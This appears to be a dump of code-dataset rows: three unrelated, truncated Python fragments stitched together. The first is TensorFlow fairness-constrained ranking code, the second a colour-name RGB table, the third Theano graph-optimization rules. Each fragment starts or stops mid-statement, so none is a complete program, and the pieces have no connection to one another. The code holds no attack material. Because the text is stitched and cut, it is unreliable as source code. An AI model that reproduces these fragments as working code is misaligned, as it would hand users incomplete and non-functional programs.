input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
= preds[query_index_]
query_labels = np.array(dataset['labels'])[query_index_]
query_ndcg.append(ndcg(query_labels[np.argsort(-query_pred_)], at=at))
return error_rate_, np.array(group_error_rate_), np.array(
query_error_rate), np.array(query_ndcg)
return error_rate_helper
def create_ranking_model(features, dimension):
  """Construct the ranking model.

  Args:
    features: Nullary function returning a batch of paired features; only the
      first `dimension` feature columns of each document are scored.
    dimension: Number of input features consumed by the ranking model.

  Returns:
    A tuple (ranking_model, predictions): the Keras model, and a nullary
    function returning the score difference between the two documents of
    each pair in the current batch.
  """
  ranking_model = tf.keras.Sequential([
      tf.keras.Input(shape=(dimension,)),
      tf.keras.layers.Dense(
          128, use_bias=True, bias_initializer='ones', activation='relu'),
      tf.keras.layers.Dense(1, use_bias=False),
  ])

  def predictions():
    # Score both documents of every pair, drop the trailing unit axis, and
    # return pairwise score differences (doc0 - doc1).
    scores = tf.squeeze(ranking_model(features()[:, :, 0:dimension]), axis=-1)
    return scores[:, 0] - scores[:, 1]

  return ranking_model, predictions
def create_multipliers_model(features, dimension, num_constraints):
  """Construct the multiplier model.

  Args:
    features: Nullary function returning a batch of paired features; the last
      `dimension` columns of the first document in each pair are used as the
      multiplier-model inputs.
    dimension: Number of trailing feature columns fed to the multiplier model.
    num_constraints: Output size, one multiplier score per constraint.

  Returns:
    A tuple (multiplier_model, multipliers): the Keras model, and a nullary
    function returning multiplier scores for the current batch.
  """
  multiplier_model = tf.keras.Sequential([
      tf.keras.Input(shape=(dimension,)),
      tf.keras.layers.Dense(
          64, use_bias=True, bias_initializer='ones', activation='tanh'),
      tf.keras.layers.Dense(num_constraints, bias_initializer='ones'),
  ])

  def multipliers():
    # NOTE(review): features() is assumed to return a NumPy array here — the
    # code uses .reshape and np.mean rather than TF ops; confirm with caller.
    raw = features()[:, 0, (-dimension):].reshape(-1, dimension)
    # Average the multiplier features across the batch and score the mean.
    mean_features = np.mean(raw, axis=0).reshape(-1, dimension)
    return multiplier_model(mean_features)

  return multiplier_model, multipliers
def formulate_problem(features,
                      groups,
                      labels,
                      dimension,
                      constraint_groups,
                      constraint_slack=None):
  """Formulates a constrained problem.

  Formulates a constrained problem that optimizes the error rate for a linear
  model on the specified dataset, subject to pairwise fairness constraints
  specified by the constraint_groups and the constraint_slack.

  Args:
    features: Nullary function returning features.
    groups: Nullary function returning groups.
    labels: Nullary function returning labels.
    dimension: Input dimension for ranking model.
    constraint_groups: List containing tuples of the form ((pos_group0,
      neg_group0), (pos_group1, neg_group1)), specifying the group memberships
      for the document pairs to compare in the constraints.
    constraint_slack: slackness epsilon allowed in the constraints. May be
      None only when constraint_groups is empty (otherwise the additions
      below would fail).

  Returns:
    A RateMinimizationProblem object, and a Keras ranking model.
  """
  # Create linear ranking model: we get back a Keras model and a nullary
  # function returning predictions on the features.
  ranking_model, predictions = create_ranking_model(features, dimension)
  # Context for the optimization objective.
  context = tfco.rate_context(predictions, labels)
  # Constraint set.
  constraint_set = []
  # Build a pair of one-sided constraints per entry, bounding the
  # false-negative-rate gap between the two group contexts in each direction.
  for ((pos_group0, neg_group0), (pos_group1, neg_group1)) in constraint_groups:
    # Context for group 0.
    group0_predictions, group0_labels = group_tensors(
        predictions, groups, pos_group0, neg_group=neg_group0)
    context_group0 = tfco.rate_context(group0_predictions, group0_labels)
    # Context for group 1.
    group1_predictions, group1_labels = group_tensors(
        predictions, groups, pos_group1, neg_group=neg_group1)
    context_group1 = tfco.rate_context(group1_predictions, group1_labels)
    # Add constraints to constraint set.
    constraint_set.append(
        tfco.false_negative_rate(context_group0) <= (
            tfco.false_negative_rate(context_group1) + constraint_slack))
    constraint_set.append(
        tfco.false_negative_rate(context_group1) <= (
            tfco.false_negative_rate(context_group0) + constraint_slack))
  # Formulate constrained minimization problem.
  problem = tfco.RateMinimizationProblem(
      tfco.error_rate(context, penalty_loss=tfco.SoftmaxCrossEntropyLoss()),
      constraint_set)
  return problem, ranking_model
def evaluate_results(model, test_set, params):
  """Returns error rates and violation metrics.

  Computes the overall error rate, per-group error rates, group-level
  constraint violations, and query-level constraint violations for `model`
  on `test_set`.

  Args:
    model: Trained ranking model to evaluate.
    test_set: Dataset dict understood by `error_rate` / `group_error_rate`.
    params: Dict whose 'constraint_type' key selects which group pairs are
      compared ('marginal_equal_opportunity',
      'cross_group_equal_opportunity', or anything else for the
      diagonal+off-diagonal variant).

  Returns:
    A tuple (overall_error, group_errors, group_violations,
    query_violations, query_violations_full).
  """
  if params['constraint_type'] == 'marginal_equal_opportunity':
    g0_error, g0_query_error = group_error_rate(model, test_set, 0)
    g1_error, g1_query_error = group_error_rate(model, test_set, 1)
    # Two-sided violations: each direction of the group error gap.
    group_violations = [g0_error - g1_error, g1_error - g0_error]
    query_violations = [np.max(np.abs(g0_query_error - g1_query_error))]
    query_violations_full = [np.abs(g0_query_error - g1_query_error)]
    return (error_rate(model, test_set), [g0_error, g1_error], group_violations,
            query_violations, query_violations_full)
  else:
    g00_error, g00_query_error = group_error_rate(model, test_set, 0, 0)
    g01_error, g01_query_error = group_error_rate(model, test_set, 0, 1)
    # BUG FIX: g10 previously called group_error_rate(model, test_set, 1, 1),
    # a copy-paste duplicate of g11. The (pos_group, neg_group) pair for g10
    # must be (1, 0), matching the g00/g01/g11 naming pattern.
    g10_error, g10_query_error = group_error_rate(model, test_set, 1, 0)
    g11_error, g11_query_error = group_error_rate(model, test_set, 1, 1)
    group_violations_offdiag = [g01_error - g10_error, g10_error - g01_error]
    group_violations_diag = [g00_error - g11_error, g11_error - g00_error]
    query_violations_offdiag = [
        np.max(np.abs(g01_query_error - g10_query_error))
    ]
    query_violations_diag = [np.max(np.abs(g00_query_error - g11_query_error))]
    query_violations_offdiag_full = np.abs(g01_query_error - g10_query_error)
    query_violations_diag_full = np.abs(g00_query_error - g11_query_error)
    if params['constraint_type'] == 'cross_group_equal_opportunity':
      # Only the off-diagonal (cross-group) comparisons matter here.
      return (error_rate(model,
                         test_set), [[g00_error, g01_error],
                                     [g10_error,
                                      g11_error]], group_violations_offdiag,
              query_violations_offdiag, [query_violations_offdiag_full])
    else:
      # Report both diagonal and off-diagonal comparisons.
      return (error_rate(model, test_set), [[g00_error, g01_error],
                                            [g10_error, g11_error]],
              group_violations_offdiag + group_violations_diag,
              query_violations_offdiag + query_violations_diag, [
                  np.concatenate((query_violations_offdiag_full,
                                  query_violations_diag_full))
              ])
def display_results(model,
                    objectives,
                    group_violations,
                    query_violations,
                    query_violations_full,
                    query_ndcgs,
                    test_set,
                    params,
                    method,
                    error_type,
                    show_header=False,
                    show_plots=False,
                    best_index=-1,
                    suffix='',
                    metric_fn=None,
                    output_file=None,
                    plot_ax=None):
  """Prints evaluation results and plots its decision boundary.

  Evaluates `model` on `test_set` (via `evaluate_results`, or via the
  supplied `metric_fn`), writes a formatted results row to `output_file`,
  and optionally plots training-progress curves and violation histograms.

  Args:
    model: Trained ranking model to evaluate.
    objectives: Per-epoch training objective values (plotted when
      show_plots).
    group_violations: Per-epoch group constraint violations.
    query_violations: Per-epoch query-level constraint violations.
    query_violations_full: Per-epoch full query violation arrays; indexed by
      `best_index` for the training histogram.
    query_ndcgs: Per-epoch mean query nDCG values.
    test_set: Dataset dict passed to `evaluate_results`.
    params: Dict with at least 'constraint_type' and 'loops'.
    method: Method name printed in the first column.
    error_type: Error-type label printed in the second column.
    show_header: If True, write the column-header line first.
    show_plots: If True, render the six diagnostic subplots.
    best_index: Epoch index whose query violations are histogrammed.
    suffix: Filename suffix for the saved plot.
    metric_fn: Optional override metric; when given, violations are computed
      from its per-query errors instead of `evaluate_results`.
    output_file: Writable file-like object for the formatted results.
    plot_ax: Optional array of 6 matplotlib axes; if None, a new figure is
      created and saved to FLAGS.save_to_dir.

  Returns:
    A list of summary metrics [error, group errors..., mean/median/90p/max
    query violation]; empty if 'constraint_type' matches neither handled
    value.
  """
  # Evaluate model on test set and print results.
  if metric_fn is None:
    error, group_error, _, _, viols = evaluate_results(model, test_set, params)
  else:
    # NOTE(review): if constraint_type is neither handled value,
    # `valid_groups` is unbound here and metric_fn would raise — presumably
    # callers only pass the two supported types; confirm.
    if params['constraint_type'] == 'marginal_equal_opportunity':
      valid_groups = [(0, None), (1, None)]
    elif params['constraint_type'] == 'cross_group_equal_opportunity':
      valid_groups = [(0, 1), (1, 0)]
    error, group_error, query_error, _ = metric_fn(model, valid_groups)
    viols = [np.abs(query_error[:, 0] - query_error[:, 1])]
  result = []
  if params['constraint_type'] == 'marginal_equal_opportunity':
    if show_header:
      output_file.write(
          '{:>20}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}\n'.format(
              'Method', 'Error', 'Overall', 'Group 0', 'Group 1', 'Mean Query',
              'Median Query', '90p Query', 'Max Query'))
    output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
                       '{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
                           method,
                           error_type,
                           error,
                           group_error[0],
                           group_error[1],
                           np.mean(viols[0]),
                           np.median(viols[0]),
                           np.percentile(viols[0], 90),
                           np.max(viols[0]),
                       ))
    result = [
        error, group_error[0], group_error[1],
        np.mean(viols[0]),
        np.median(viols[0]),
        np.percentile(viols[0], 90),
        np.max(viols[0])
    ]
  elif params['constraint_type'] == 'cross_group_equal_opportunity':
    if show_header:
      output_file.write(
          '{:>20}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}\n'.format(
              'Method', 'Error', 'Overall', 'Group 0/1', 'Group 1/0',
              'Mean Query', 'Median Query', '90p Query', 'Max Query'))
    if metric_fn is None:
      # evaluate_results returns nested [group][group] error lists here.
      output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
                         '{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
                             method,
                             error_type,
                             error,
                             group_error[0][1],
                             group_error[1][0],
                             np.mean(viols[0]),
                             np.median(viols[0]),
                             np.percentile(viols[0], 90),
                             np.max(viols[0]),
                         ))
      result = [
          error, group_error[0][1], group_error[1][0],
          np.mean(viols[0]),
          np.median(viols[0]),
          np.percentile(viols[0], 90),
          np.max(viols[0])
      ]
    else:
      # metric_fn returns a flat per-group error list.
      output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
                         '{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
                             method,
                             error_type,
                             error,
                             group_error[0],
                             group_error[1],
                             np.mean(viols[0]),
                             np.median(viols[0]),
                             np.percentile(viols[0], 90),
                             np.max(viols[0]),
                         ))
      result = [
          error, group_error[0], group_error[1],
          np.mean(viols[0]),
          np.median(viols[0]),
          np.percentile(viols[0], 90),
          np.max(viols[0])
      ]
  # Plot decision boundary and progress of training objective/constraint viol.
  if show_plots:
    if plot_ax is None:
      ff, ax = plt.subplots(1, 6, figsize=(16.0, 3.5))
    else:
      ax = plot_ax
    ax[0].set_title('Overall Error')
    ax[0].set_xlabel('Number of epochs')
    ax[0].plot(range(params['loops']), objectives)
    ax[1].set_title('Group Constraint Violation')
    ax[1].set_xlabel('Number of epochs')
    ax[1].plot(range(params['loops']), np.max(group_violations, axis=1))
    ax[2].set_title('Max% Percentile Query \nConstraint Violation per Epoch')
    ax[2].set_xlabel('Number of epochs')
    ax[2].plot(
        range(params['loops']), np.percentile(query_violations, 90, axis=1))
    ax[3].set_title('Training Final Query\nConstraint Violation')
    ax[3].set_xlabel('Constraint violation')
    ax[3].set_ylim(bottom=0, top=20)
    ax[3].hist(
        np.array(query_violations_full)[best_index, :][0],
        range=(0, 1),
        bins=20,
        density=True)
    ax[4].set_title('Testing Query \nConstraint Violation')
    ax[4].set_xlabel('Constraint violation')
    ax[4].set_ylim(bottom=0, top=20)
    ax[4].hist(np.array(viols[0]), range=(0, 1), bins=20, density=True)
    ax[5].set_title('Mean Query nDCG')
    ax[5].set_xlabel('Number of Epochs')
    ax[5].plot(range(params['loops']), query_ndcgs)
    if plot_ax is None:
      # Only save when we created the figure ourselves.
      ff.tight_layout()
      plt.savefig('{}/{}_plot_{}.png'.format(FLAGS.save_to_dir, FLAGS.prefix,
                                             suffix))
  return result
def train_model(train_set, params, metric_fn=None, valid_set=None):
"""Set up problem and model."""
# include id = 0
np.random.seed(121212 + FLAGS.id)
random.seed(212121 + FLAGS.id)
tf.compat.v1.set_random_seed(123456 + FLAGS.id)
if params['multiplier_type'] == 'unconstrained':
# Unconstrained optimization.
constraint_groups = []
if params['constraint_type'] == 'marginal_equal_opportunity':
valid_groups = [(0, None), (1, None)]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
valid_groups = [(0, 1), (1, 0)]
else:
# Constrained optimization.
if params['constraint_type'] == 'marginal_equal_opportunity':
constraint_groups = [((0, None), (1, None))]
valid_groups = [(0, None), (1, None)]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
constraint_groups = [((0, 1), (1, 0))]
valid_groups = [(0, 1), (1, 0)]
elif params['constraint_type'] == 'custom':
constraint_groups = params['constraint_groups']
else:
constraint_groups = []
if 'multiplier_dimension' not in params:
multiplier_dimension = train_set['features'].shape[2] - train_set[
'dimension']
else:
multiplier_dimension = params['multiplier_dimension']
# Dictionary that will hold batch features pairs, group pairs and labels for
# current batch. We include one query per-batch.
paired_batch = {}
batch_index = 0 # Index of current query.
# Data functions.
features = lambda: paired_batch['features']
groups = lambda: paired_batch['groups']
labels = lambda: np.ones(paired_batch['features'].shape[0])
# Create ranking model and constrained optimization problem.
problem, ranking_model = formulate_problem(features, groups, labels,
train_set['dimension'],
constraint_groups,
params['constraint_slack'])
if (params['multiplier_type'] == 'unconstrained') or (
params['multiplier_type'] == 'common'):
# Unconstrained optimization or constrained optimization with a common
# set of Lagrange multipliers for all query.
# Create Lagrangian loss for problem with standard TFCO.
lagrangian_loss, update_ops, multipliers_variables = (
tfco.create_lagrangian_loss(problem, dual_scale=params['dual_scale']))
multipliers_variables_list = [multipliers_variables]
# All paired queries are valid
check_train_pair = lambda _: True
else:
# Constrained optimization with feature-dependent multiplier, or with
# per-query multipliers, i.e. separate set of multipliers per each query.
if params['multiplier_type'] == 'feature_dependent':
# Create multipliers model.
print('Creating multiplier model with {} features.'.format(
multiplier_dimension))
multiplier_model, multipliers = create_multipliers_model(
features, multiplier_dimension, problem.num_constraints)
multipliers_variables_list = multiplier_model.trainable_weights
check_train_pair = lambda x: np.unique(x['groups'], axis=0).shape[0] >= 4
elif params['multiplier_type'] == 'per-query':
# Create separate set of multipliers per query.
multipliers_variables = tf.Variable(
np.ones((train_set['num_queries'], problem.num_constraints)),
dtype=tf.float32)
def multipliers():
return tf.reshape(multipliers_variables[batch_index, :], (-1,))
multipliers_variables_list = [multipliers_variables]
check_train_pair = lambda _: True
else:
raise ValueError('Invalid multiplier type')
# Create Lagrangian loss with multipliers defined above.
def lagrangian_loss():
# Separate out objective, constraints and proxy constraints.
objective = problem.objective()
constraints = problem.constraints()
if constraints.shape[0] == 0:
# If no constraints, just return objective.
return objective
# Set up custom Lagrangian loss.
proxy_constraints = problem.proxy_constraints()
multipliers_tensor = tf.abs(multipliers()) # Abs enforces non-negativity.
primal = objective + tf.tensordot(
tf.stop_gradient(multipliers_tensor), proxy_constraints, 1)
dual = params['dual_scale'] * tf.tensordot(
multipliers_tensor, tf.stop_gradient(constraints), 1)
return primal - dual
update_ops = problem.update_ops
# Create optimizer
if FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(learning_rate=params['learning_rate'])
elif FLAGS.optimizer == 'adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=params['learning_rate'])
else:
optimizer = tf.keras.optimizers.Adagrad(
learning_rate=params['learning_rate'])
# List of trainable variables.
if params['multiplier_type'] == 'unconstrained':
var_list = ranking_model.trainable_weights + problem.trainable_variables
else:
var_list = (
ranking_model.trainable_weights + problem.trainable_variables +
multipliers_variables_list)
# List of objectives, group constraint violations, per-query constraint
# violations, and | |
'grey59': (150, 150, 150),
'grey6': (15, 15, 15),
'grey60': (153, 153, 153),
'grey61': (156, 156, 156),
'grey62': (158, 158, 158),
'grey63': (161, 161, 161),
'grey64': (163, 163, 163),
'grey65': (166, 166, 166),
'grey66': (168, 168, 168),
'grey67': (171, 171, 171),
'grey68': (173, 173, 173),
'grey69': (176, 176, 176),
'grey7': (18, 18, 18),
'grey70': (179, 179, 179),
'grey71': (181, 181, 181),
'grey72': (184, 184, 184),
'grey73': (186, 186, 186),
'grey74': (189, 189, 189),
'grey75': (191, 191, 191),
'grey76': (194, 194, 194),
'grey77': (196, 196, 196),
'grey78': (199, 199, 199),
'grey79': (201, 201, 201),
'grey8': (20, 20, 20),
'grey80': (204, 204, 204),
'grey81': (207, 207, 207),
'grey82': (209, 209, 209),
'grey83': (212, 212, 212),
'grey84': (214, 214, 214),
'grey85': (217, 217, 217),
'grey86': (219, 219, 219),
'grey87': (222, 222, 222),
'grey88': (224, 224, 224),
'grey89': (227, 227, 227),
'grey9': (23, 23, 23),
'grey90': (229, 229, 229),
'grey91': (232, 232, 232),
'grey92': (235, 235, 235),
'grey93': (237, 237, 237),
'grey94': (240, 240, 240),
'grey95': (242, 242, 242),
'grey96': (245, 245, 245),
'grey97': (247, 247, 247),
'grey98': (250, 250, 250),
'grey99': (252, 252, 252),
'honeydew': (240, 255, 240),
'honeydew1': (240, 255, 240),
'honeydew2': (224, 238, 224),
'honeydew3': (193, 205, 193),
'honeydew4': (131, 139, 131),
'hotpink': (255, 105, 180),
'hotpink1': (255, 110, 180),
'hotpink2': (238, 106, 167),
'hotpink3': (205, 96, 144),
'hotpink4': (139, 58, 98),
'indianred': (205, 92, 92),
'indianred1': (255, 106, 106),
'indianred2': (238, 99, 99),
'indianred3': (205, 85, 85),
'indianred4': (139, 58, 58),
'indigo': (75, 0, 130),
'invis': (255, 255, 254),
'ivory': (255, 255, 240),
'ivory1': (255, 255, 240),
'ivory2': (238, 238, 224),
'ivory3': (205, 205, 193),
'ivory4': (139, 139, 131),
'khaki': (240, 230, 140),
'khaki1': (255, 246, 143),
'khaki2': (238, 230, 133),
'khaki3': (205, 198, 115),
'khaki4': (139, 134, 78),
'lavender': (230, 230, 250),
'lavenderblush': (255, 240, 245),
'lavenderblush1': (255, 240, 245),
'lavenderblush2': (238, 224, 229),
'lavenderblush3': (205, 193, 197),
'lavenderblush4': (139, 131, 134),
'lawngreen': (124, 252, 0),
'lemonchiffon': (255, 250, 205),
'lemonchiffon1': (255, 250, 205),
'lemonchiffon2': (238, 233, 191),
'lemonchiffon3': (205, 201, 165),
'lemonchiffon4': (139, 137, 112),
'lightblue': (173, 216, 230),
'lightblue1': (191, 239, 255),
'lightblue2': (178, 223, 238),
'lightblue3': (154, 192, 205),
'lightblue4': (104, 131, 139),
'lightcoral': (240, 128, 128),
'lightcyan': (224, 255, 255),
'lightcyan1': (224, 255, 255),
'lightcyan2': (209, 238, 238),
'lightcyan3': (180, 205, 205),
'lightcyan4': (122, 139, 139),
'lightgoldenrod': (238, 221, 130),
'lightgoldenrod1': (255, 236, 139),
'lightgoldenrod2': (238, 220, 130),
'lightgoldenrod3': (205, 190, 112),
'lightgoldenrod4': (139, 129, 76),
'lightgoldenrodyellow': (250, 250, 210),
'lightgray': (211, 211, 211),
'lightgrey': (211, 211, 211),
'lightpink': (255, 182, 193),
'lightpink1': (255, 174, 185),
'lightpink2': (238, 162, 173),
'lightpink3': (205, 140, 149),
'lightpink4': (139, 95, 101),
'lightsalmon': (255, 160, 122),
'lightsalmon1': (255, 160, 122),
'lightsalmon2': (238, 149, 114),
'lightsalmon3': (205, 129, 98),
'lightsalmon4': (139, 87, 66),
'lightseagreen': (32, 178, 170),
'lightskyblue': (135, 206, 250),
'lightskyblue1': (176, 226, 255),
'lightskyblue2': (164, 211, 238),
'lightskyblue3': (141, 182, 205),
'lightskyblue4': (96, 123, 139),
'lightslateblue': (132, 112, 255),
'lightslategray': (119, 136, 153),
'lightslategrey': (119, 136, 153),
'lightsteelblue': (176, 196, 222),
'lightsteelblue1': (202, 225, 255),
'lightsteelblue2': (188, 210, 238),
'lightsteelblue3': (162, 181, 205),
'lightsteelblue4': (110, 123, 139),
'lightyellow': (255, 255, 224),
'lightyellow1': (255, 255, 224),
'lightyellow2': (238, 238, 209),
'lightyellow3': (205, 205, 180),
'lightyellow4': (139, 139, 122),
'limegreen': (50, 205, 50),
'linen': (250, 240, 230),
'magenta': (255, 0, 255),
'magenta1': (255, 0, 255),
'magenta2': (238, 0, 238),
'magenta3': (205, 0, 205),
'magenta4': (139, 0, 139),
'maroon': (176, 48, 96),
'maroon1': (255, 52, 179),
'maroon2': (238, 48, 167),
'maroon3': (205, 41, 144),
'maroon4': (139, 28, 98),
'mediumaquamarine': (102, 205, 170),
'mediumblue': (0, 0, 205),
'mediumorchid': (186, 85, 211),
'mediumorchid1': (224, 102, 255),
'mediumorchid2': (209, 95, 238),
'mediumorchid3': (180, 82, 205),
'mediumorchid4': (122, 55, 139),
'mediumpurple': (147, 112, 219),
'mediumpurple1': (171, 130, 255),
'mediumpurple2': (159, 121, 238),
'mediumpurple3': (137, 104, 205),
'mediumpurple4': (93, 71, 139),
'mediumseagreen': (60, 179, 113),
'mediumslateblue': (123, 104, 238),
'mediumspringgreen': (0, 250, 154),
'mediumturquoise': (72, 209, 204),
'mediumvioletred': (199, 21, 133),
'midnightblue': (25, 25, 112),
'mintcream': (245, 255, 250),
'mistyrose': (255, 228, 225),
'mistyrose1': (255, 228, 225),
'mistyrose2': (238, 213, 210),
'mistyrose3': (205, 183, 181),
'mistyrose4': (139, 125, 123),
'moccasin': (255, 228, 181),
'navajowhite': (255, 222, 173),
'navajowhite1': (255, 222, 173),
'navajowhite2': (238, 207, 161),
'navajowhite3': (205, 179, 139),
'navajowhite4': (139, 121, 94),
'navy': (0, 0, 128),
'navyblue': (0, 0, 128),
'none': (255, 255, 254),
'oldlace': (253, 245, 230),
'olivedrab': (107, 142, 35),
'olivedrab1': (192, 255, 62),
'olivedrab2': (179, 238, 58),
'olivedrab3': (154, 205, 50),
'olivedrab4': (105, 139, 34),
'orange': (255, 165, 0),
'orange1': (255, 165, 0),
'orange2': (238, 154, 0),
'orange3': (205, 133, 0),
'orange4': (139, 90, 0),
'orangered': (255, 69, 0),
'orangered1': (255, 69, 0),
'orangered2': (238, 64, 0),
'orangered3': (205, 55, 0),
'orangered4': (139, 37, 0),
'orchid': (218, 112, 214),
'orchid1': (255, 131, 250),
'orchid2': (238, 122, 233),
'orchid3': (205, 105, 201),
'orchid4': (139, 71, 137),
'palegoldenrod': (238, 232, 170),
'palegreen': (152, 251, 152),
'palegreen1': (154, 255, 154),
'palegreen2': (144, 238, 144),
'palegreen3': (124, 205, 124),
'palegreen4': (84, 139, 84),
'paleturquoise': (175, 238, 238),
'paleturquoise1': (187, 255, 255),
'paleturquoise2': (174, 238, 238),
'paleturquoise3': (150, 205, 205),
'paleturquoise4': (102, 139, 139),
'palevioletred': (219, 112, 147),
'palevioletred1': (255, 130, 171),
'palevioletred2': (238, 121, 159),
'palevioletred3': (205, 104, 137),
'palevioletred4': (139, 71, 93),
'papayawhip': (255, 239, 213),
'peachpuff': (255, 218, 185),
'peachpuff1': (255, 218, 185),
'peachpuff2': (238, 203, 173),
'peachpuff3': (205, 175, 149),
'peachpuff4': (139, 119, 101),
'peru': (205, 133, 63),
'pink': (255, 192, 203),
'pink1': (255, 181, 197),
'pink2': (238, 169, 184),
'pink3': (205, 145, 158),
'pink4': (139, 99, 108),
'plum': (221, 160, 221),
'plum1': (255, 187, 255),
'plum2': (238, 174, 238),
'plum3': (205, 150, 205),
'plum4': (139, 102, 139),
'powderblue': (176, 224, 230),
'purple': (160, 32, 240),
'purple1': (155, 48, 255),
'purple2': (145, 44, 238),
'purple3': (125, 38, 205),
'purple4': (85, 26, 139),
'red': (255, 0, 0),
'red1': (255, 0, 0),
'red2': (238, 0, 0),
'red3': (205, 0, 0),
'red4': (139, 0, 0),
'rosybrown': (188, 143, 143),
'rosybrown1': (255, 193, 193),
'rosybrown2': (238, 180, 180),
'rosybrown3': (205, 155, 155),
'rosybrown4': (139, 105, 105),
'royalblue': (65, 105, 225),
'royalblue1': (72, 118, 255),
'royalblue2': (67, 110, 238),
'royalblue3': (58, 95, 205),
'royalblue4': (39, 64, 139),
'saddlebrown': (139, 69, 19),
'salmon': (250, 128, 114),
'salmon1': (255, 140, 105),
'salmon2': (238, 130, 98),
'salmon3': (205, 112, 84),
'salmon4': (139, 76, 57),
'sandybrown': (244, 164, 96),
'seagreen': (46, 139, 87),
'seagreen1': (84, 255, 159),
'seagreen2': (78, 238, 148),
'seagreen3': (67, 205, 128),
'seagreen4': (46, 139, 87),
'seashell': (255, 245, 238),
'seashell1': (255, 245, 238),
'seashell2': (238, 229, 222),
'seashell3': (205, 197, 191),
'seashell4': (139, 134, 130),
'sienna': (160, 82, 45),
'sienna1': (255, 130, 71),
'sienna2': (238, 121, 66),
'sienna3': (205, 104, 57),
'sienna4': (139, 71, 38),
'skyblue': (135, 206, 235),
'skyblue1': (135, 206, 255),
'skyblue2': (126, 192, 238),
'skyblue3': (108, 166, 205),
'skyblue4': (74, 112, 139),
'slateblue': (106, 90, 205),
'slateblue1': (131, 111, 255),
'slateblue2': (122, 103, 238),
'slateblue3': (105, 89, 205),
'slateblue4': (71, 60, 139),
'slategray': (112, 128, 144),
'slategray1': (198, 226, 255),
'slategray2': (185, 211, 238),
'slategray3': (159, 182, 205),
'slategray4': (108, 123, 139),
'slategrey': (112, 128, 144),
'snow': (255, 250, 250),
'snow1': (255, 250, 250),
'snow2': (238, 233, 233),
'snow3': (205, 201, 201),
'snow4': (139, 137, 137),
'springgreen': (0, 255, 127),
'springgreen1': (0, 255, 127),
'springgreen2': (0, 238, 118),
'springgreen3': (0, 205, 102),
'springgreen4': (0, 139, 69),
'steelblue': (70, 130, 180),
'steelblue1': (99, 184, 255),
'steelblue2': (92, 172, 238),
'steelblue3': (79, 148, 205),
'steelblue4': (54, 100, 139),
'tan': (210, 180, 140),
'tan1': (255, 165, 79),
'tan2': (238, 154, 73),
'tan3': (205, 133, 63),
'tan4': (139, 90, 43),
'thistle': (216, 191, 216),
'thistle1': (255, 225, 255),
'thistle2': (238, 210, 238),
'thistle3': (205, 181, 205),
'thistle4': (139, 123, 139),
'tomato': (255, 99, 71),
'tomato1': (255, 99, 71),
'tomato2': (238, 92, 66),
'tomato3': (205, 79, 57),
'tomato4': (139, 54, 38),
| |
numpy.all(t.type.broadcastable)]
if len(scalars) == 0:
# Nothing to optimize here
return
non_scalars = [t for t in terms if not numpy.all(t.broadcastable)]
# Perform the op only on the non-scalar inputs, if applicable
if len(non_scalars) == 0:
new_op_input_nb_elements = 1
new_op_output = 1
elif len(non_scalars) == 1:
new_op_input_nb_elements = non_scalars[0].size
new_op_output = node.op(non_scalars[0])
else:
new_op_input = T.mul(*non_scalars)
new_op_input_nb_elements = new_op_input.size
new_op_output = node.op(new_op_input)
# If node.op is a T.elemwise.Prod, then the scalars need to be
# raised to the power of the number of elements in the input
# to the Prod
if (isinstance(node.op, T.elemwise.Prod) and
new_op_input_nb_elements != 1):
scalars = [s ** new_op_input_nb_elements for s in scalars]
# Scale the output of the op by the scalars and return as
# replacement for the original output
mul_inputs = scalars
if new_op_input_nb_elements != 1:
mul_inputs.append(new_op_output)
if len(mul_inputs) == 1:
return mul_inputs
else:
return [T.mul(*mul_inputs)]
if isinstance(node.op, T.Sum) and node_inps.owner and node_inps.owner.op == T.neg:
return [T.neg(node.op(node_inps.owner.inputs[0]))]
@register_specialize
@gof.local_optimizer([T.Elemwise])
def local_elemwise_sub_zeros(node):
    """
    Elemwise{sub}(X,X) -> zeros_like(X)
    """
    op = node.op
    # Guard clauses: only a binary elementwise subtraction of a variable
    # from itself qualifies.
    if not isinstance(op, T.Elemwise):
        return
    if op.scalar_op.nin != 2 or op.scalar_op != scalar.sub:
        return
    lhs, rhs = node.inputs
    if lhs == rhs:
        return [T.zeros_like(lhs)]
@register_specialize
@register_stabilize
@register_canonicalize
@gof.local_optimizer([T.Elemwise])
def local_useless_elemwise_comparison(node):
    """Simplify elementwise comparisons whose result is statically known.

    :note: These cases appear in the graph generated by scan.
           These optimizations will make the graph easier to read.

    # Comparing to itself is constant
    Elemwise[{LT,GT}](X, X) -> Elemwise[zeros](X)
    Elemwise[{LE,GE}](X, X) -> Elemwise[ones](X)
    Elemwise[{minimum,maximum}](X, X) -> X

    # Comparing shape to 0 can be constant
    Elemwise[LT](X.shape[i], 0) -> Elemwise[zeros](X)
    Elemwise[GE](X.shape[i], 0) -> Elemwise[ones](X)
    Elemwise[maximum](X.shape[i], 0) -> X.shape[i]
    Elemwise[maximum](0, X.shape[i]) -> X.shape[i]
    Elemwise[minimum](X.shape[i], 0) -> 0
    Elemwise[minimum](0, X.shape[i]) -> 0

    # The shape can be replaced with sum of shapes
    Elemwise[LT](add([anything that is shapes]), 0) -> Elemwise[zeros](X)
    Elemwise[GE](add([anything that is shapes]), 0) -> Elemwise[ones](X)
    """
    # Only binary elementwise ops are candidates.
    if not isinstance(node.op, T.Elemwise):
        return
    if node.op.scalar_op.nin != 2:
        return
    # Self-comparison checks use `is` (same graph variable), not structural
    # equality.
    # Elemwise[{LT,GT}](X, X) -> Elemwise[zeros](X)
    if isinstance(node.op.scalar_op, (scalar.LT, scalar.GT)) and \
       node.inputs[0] is node.inputs[1]:
        return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[{LE,GE}](X, X) -> Elemwise[ones](X)
    if isinstance(node.op.scalar_op, (scalar.LE, scalar.GE)) and \
